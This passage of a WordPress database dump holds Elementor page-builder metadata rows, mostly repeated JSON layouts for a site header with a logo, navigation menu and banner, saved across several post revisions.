center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4329,4937,'_elementor_page_assets','a:0:{}'),(4330,4937,'_elementor_pro_version','3.8.1'),(4335,4938,'_wp_page_template','default'),(4336,4938,'_elementor_edit_mode','builder'),(4337,4938,'_elementor_template_type','wp-post'),(4338,4938,'_elementor_version','3.6.6'),(4339,4938,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4340,4938,'_elementor_page_assets','a:0:{}'),(4367,4636,'_edit_lock','1695379855:2'),(4368,4941,'_wp_page_template','default'),(4369,4941,'_elementor_edit_mode','builder'),(4370,4941,'_elementor_template_type','wp-post'),(4371,4941,'_elementor_version','3.8.1'),(4372,4941,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4373,4941,'_elementor_page_assets','a:0:{}'),(4374,4941,'_elementor_pro_version','3.8.1'),(4377,4943,'_wp_page_template','default'),(4378,4943,'_elementor_edit_mode','builder'),(4379,4943,'_elementor_template_type','wp-post'),(4380,4943,'_elementor_version','3.8.1'),(4381,4943,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":159,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4382,4943,'_elementor_page_assets','a:0:{}'),(4383,4943,'_elementor_pro_version','3.8.1'),(4384,4943,'_elementor_css','a:6:{s:4:\"time\";i:1695380242;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4385,4944,'_wp_page_template','default'),(4386,4944,'_elementor_edit_mode','builder'),(4387,4944,'_elementor_template_type','wp-post'),(4388,4944,'_elementor_version','3.8.1'),(4389,4944,'_elementor_data','[{\"id\":\"4b8ed48\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-header-banner-50.jpg\",\"id\":176,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.15,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b854cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"331f515\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"background_color\":\"#8B8B8B\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\